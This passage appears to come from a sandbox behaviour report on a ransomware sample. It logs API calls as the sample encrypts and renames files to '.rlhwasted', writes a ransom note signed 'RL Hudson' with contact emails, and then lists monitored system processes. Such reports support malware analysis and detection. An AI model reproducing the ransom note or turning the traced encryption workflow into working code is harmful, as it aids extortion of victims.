Flags=0x0, Size=0x280) returned 0x6d5420 [0201.138] lstrcpyW (in: lpString1=0x6d5496, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0201.138] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0201.138] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6fdf68) returned 1 [0201.139] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0201.139] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.rlhwasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0201.140] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0201.141] SetEndOfFile (hFile=0x108) returned 1 [0201.141] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.141] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0201.141] lstrcpyW (in: lpString1=0x6d5496, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0201.142] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.rlhwasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.rlhwasted")) returned 1 [0201.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.rlhwasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0201.145] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0201.146] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x8907c [0201.146] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8907c) returned 0x12b0000 [0201.146] CloseHandle (hObject=0x128) returned 1 [0201.235] UnmapViewOfFile (lpBaseAddress=0x12b0000) returned 1 [0201.241] CloseHandle (hObject=0x10c) returned 1 [0201.241] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0201.241] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6fdf68) returned 1 [0201.242] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0201.242] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.242] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6fdf68) returned 1 [0201.243] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0201.243] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.251] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d56a8 [0201.251] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0201.251] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0201.251] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Iog2pePs4HrCi2etCi/mejAXWumih+mKm1fOQUH0POdj1OICeTLd+TkKgC/uY009\r\nLhIllrpC2o25w4DWkgsPqWT2EHuo8qXPVLfggRX0unF+Y/x5eIrT0ipX6tqG+JeX\r\nKpttvKwV7CoKINUgHR8388BBL+Ht9W25tdbqc5yKGHcuz5RuEnfW4pGplOluOFq6\r\nlWRrsetID22iYEJ52nVufY1ekcETkNsbBREjGbzWzINQjJvDiGvGME5Sy8iT9iwI\r\nreGkIMuLNA3up70Q9aAbng6cG+/vCJe1QuJCYzBOOcQCpyx+tcxIKHVDMZHrC3IW\r\nF7xBiN9eADC9EtTMr42DHvg9ZsuEQjSKXJLlW0JLNN0EaGQnuSWzvBh9UqXFvrGh\r\nmy9ZhnaR0grx3BbVyfmTgpWpKxAxhsI4hJfiBVSJNE+5MpClUVDP9wh99jfOk9qw\r\nlClB6qOi4O9puJLzvUy6hg+pxadDyDGuJUn/AYia2tVlMJJbp7pBi4WYFCQoAngh\r\nXyJ0NFAQjafhquSU6iKQXAibbMd3Uv8o6DPlt01MMxEgkwRvsTsG0lQxzGMRPTnh\r\nnvuuyNiBA9xMF+DloNQxjOvS4AvjhVepyiBqjRfe5dcz7Q9M7ylBR9kW45vys05K\r\nmUbUvUJ6M6z9Vxp7WvpVesADNmdWoE0mFglXBuRS6g9=[end_key]\r\nKEEP IT\r\n") returned 981 [0201.251] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d56a8 | out: hHeap=0x6b0000) returned 1 [0201.251] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0201.251] SetEndOfFile (hFile=0x108) returned 1 [0201.253] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0201.253] CloseHandle (hObject=0x108) returned 1 [0201.253] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0201.253] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x706ad0 | out: hHeap=0x6b0000) returned 1 [0201.253] _aulldvrm () returned 0x0 [0201.253] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6fdf68) returned 1 [0201.254] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0201.254] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.254] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0201.254] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x278) returned 0x6d5420 [0201.254] lstrcpyW (in: lpString1=0x6d548e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0201.254] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0201.254] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6fdf68) returned 1 [0201.255] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0201.255] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.rlhwasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0201.256] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0201.257] SetEndOfFile (hFile=0x108) returned 1 [0201.257] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.257] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0201.257] lstrcpyW (in: lpString1=0x6d548e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0201.257] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.rlhwasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.rlhwasted")) returned 1 [0201.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.rlhwasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0201.258] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0201.258] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x97958 [0201.258] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x97958) returned 0x1400000 [0201.258] CloseHandle (hObject=0x10c) returned 1 [0201.333] UnmapViewOfFile (lpBaseAddress=0x1400000) returned 1 [0201.340] CloseHandle (hObject=0x124) returned 1 [0201.340] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0201.340] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6fdf68) returned 1 [0201.340] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0201.340] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.341] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6fdf68) returned 1 [0201.341] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0201.341] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.357] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d56a0 [0201.357] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0201.357] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0201.357] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]WFRO+uox7WOqD2pyzxSPKLZX8exEjJoAqeQGzYb5J9n3+M9ZutNS+ijMARMqrRK4\r\nsvtBqQpsYXxETjgEjpJglAA+SpXOsS4eFl7/U30FFcww+CX0Yay5nwl86MdTFjnR\r\nLgFZcBWu/2nKl4fyU05neK4JZS5n2NkR3up/6pWlg6DagQoQnrdbvX0OArnYV2Iq\r\nGzfxJetctDxhhJnqXTE03vjma/xv+aL/2EgiGMozgYKFuZTrBee6KIluMnpV2kBw\r\nSpV+vu0t1tqyRlwkxDTiJ1d5Hs9YTjJysKhTGNrP9wugY5idgTSnwvm4F7z/dhKq\r\nRrqIed8oSae1TRTXO7EuJxFQYyX2QI/UhQ/DPa/NAyAkfJj8yh5njU6ZapiYwikx\r\nu4BHJ428LC/gqa1NzjQYz5MJQzOfj9aUMA8bmdG9F4jZS8ad52eNSNwcD0Zaayp7\r\n8TU/tWWsd6X7H5Mx4XYZAp9nn1G4wzhshLgbsQWKWt58AA5jgkNw9LuF4dZELBBW\r\n9uSxYLAtQQrBTlX+PBL/3cD7iBqWdJXOSRIXeD5EAp1BZR+29+HloPQMGRBzgkDz\r\nna7o/R4oHIB5LdIDkws0Utjo9vaYyNikMZvfl7TnordRnaklmB+bB9+7IIMW0KHd\r\nCjjMcCsK2My/L0F1kFkOhfNtT66qs7vBt8OF9s5wcKB=[end_key]\r\nKEEP IT\r\n") returned 981 [0201.358] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d56a0 | out: hHeap=0x6b0000) returned 1 [0201.358] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0201.358] SetEndOfFile (hFile=0x108) returned 1 [0201.360] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0201.360] CloseHandle (hObject=0x108) returned 1 [0201.360] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0201.360] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f0b00 | out: hHeap=0x6b0000) returned 1 [0201.361] ResetEvent (hEvent=0xf8) returned 1 [0201.361] _aulldvrm () returned 0x0 [0201.361] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6fdf68) returned 1 [0201.361] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0201.362] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.362] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0201.362] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x274) returned 0x6d5420 [0201.362] lstrcpyW (in: lpString1=0x6d548a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0201.362] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0201.362] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6fdf68) returned 1 [0201.362] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0201.363] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.rlhwasted_info" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0201.363] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0201.364] SetEndOfFile (hFile=0x108) returned 1 [0201.364] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.364] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0201.364] lstrcpyW (in: lpString1=0x6d548a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0201.364] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.rlhwasted" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.rlhwasted")) returned 1 [0201.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.rlhwasted" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0201.365] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0201.366] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x1907b8a [0201.366] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1907b8a) returned 0x1de0000 [0201.366] CloseHandle (hObject=0x124) returned 1 Process: id = "25" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x39198000" os_pid = "0xb64" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 340 os_tid = 0x290 Thread: id = 341 os_tid = 0x6cc Thread: id = 343 os_tid = 0x924 Thread: id = 344 os_tid = 0x5b4 Thread: id = 345 os_tid = 0x614 Thread: id = 346 os_tid = 0x690 Thread: id = 347 os_tid = 0x7d8 Process: id = "26" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x63995000" os_pid = "0x4d0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x370" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 352 os_tid = 0x220 Thread: id = 358 os_tid = 0x8f8 Thread: id = 359 os_tid = 0x360 Thread: id = 360 os_tid = 0x918 Thread: id = 361 os_tid = 0x8e8 Thread: id = 362 os_tid = 0x320 Process: id = "27" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 369 os_tid = 0x8 Thread: id = 370 os_tid = 0x9c Thread: id = 371 os_tid = 0x78 Thread: id = 372 os_tid = 0xc0 Thread: id = 373 os_tid = 0xc8 Thread: id = 374 os_tid = 0x28 Thread: id = 375 os_tid = 0x3c Thread: id = 376 os_tid = 0x34 Thread: id = 377 os_tid = 0x50 Thread: id = 378 os_tid = 0x5c Thread: id = 379 os_tid = 0x4c Thread: id = 380 os_tid = 0x30 Thread: id = 381 os_tid = 0xc4 Thread: id = 382 os_tid = 0xd0 Thread: id = 383 os_tid = 0xb8 Thread: id = 384 os_tid = 0xd4 Thread: id = 385 os_tid = 0xd8 Thread: id = 386 os_tid = 0xdc Thread: id = 389 os_tid = 0x0 Thread: id = 391 os_tid = 0x48 Thread: id = 392 os_tid = 0x2c Thread: id = 393 os_tid = 0xf4 Thread: id = 394 os_tid = 0xf8 Thread: id = 395 os_tid = 0x104 Thread: id = 396 os_tid = 0x108 Thread: id = 397 os_tid = 0x100 Thread: id = 398 os_tid = 0x84 Thread: id = 399 os_tid = 0x80 Thread: id = 400 os_tid = 0x88 Thread: id = 401 os_tid = 0x90 Thread: id = 402 os_tid = 0x8c Thread: id = 403 os_tid = 0x40 Thread: id = 404 os_tid = 0xb0 Thread: id = 405 os_tid = 0xfc Thread: id = 406 os_tid = 0x44 Thread: id = 407 os_tid = 0x20 Thread: id = 408 os_tid = 0x110 Thread: id = 409 os_tid = 0xb4 Thread: id = 410 os_tid = 0x114 Thread: id = 411 os_tid = 0x118 Thread: id = 415 os_tid = 0x134 Thread: id = 416 os_tid = 0x138 Thread: id = 417 os_tid = 0x13c Thread: id = 418 os_tid = 0x140 Thread: id = 434 os_tid = 0xbc Thread: id = 435 os_tid = 0x17c Thread: id = 444 os_tid = 0x60 Thread: id = 462 os_tid = 0x98 Thread: id = 465 os_tid = 0x68 Thread: id = 487 os_tid = 0x74 Thread: id = 492 os_tid = 0x274 Thread: id = 519 os_tid = 0x2e8 Process: id = "28" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2aecb000" os_pid = "0xe0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "27" os_parent_pid = "0x4" cmd_line = "\\SystemRoot\\System32\\smss.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 387 os_tid = 0xe4 Thread: id = 388 os_tid = 0xe8 Thread: id = 412 os_tid = 0x120 Thread: id = 423 os_tid = 0x164 Process: id = "29" image_name = "autochk.exe" filename = "c:\\windows\\system32\\autochk.exe" page_root = "0x2ac4d000" os_pid = "0xec" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0xe0" cmd_line = "\\??\\C:\\Windows\\system32\\autochk.exe *" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 390 os_tid = 0xf0 Process: id = "30" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x20aa3000" os_pid = "0x124" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000000 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 413 os_tid = 0x128 Process: id = "31" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x1ed55000" os_pid = "0x12c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0x124" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 414 os_tid = 0x130 Thread: id = 419 os_tid = 0x144 Thread: id = 420 os_tid = 0x148 Thread: id = 421 os_tid = 0x14c Thread: id = 422 os_tid = 0x150 Thread: id = 426 os_tid = 0x170 Thread: id = 436 os_tid = 0x198 Thread: id = 437 os_tid = 0x19c Thread: id = 443 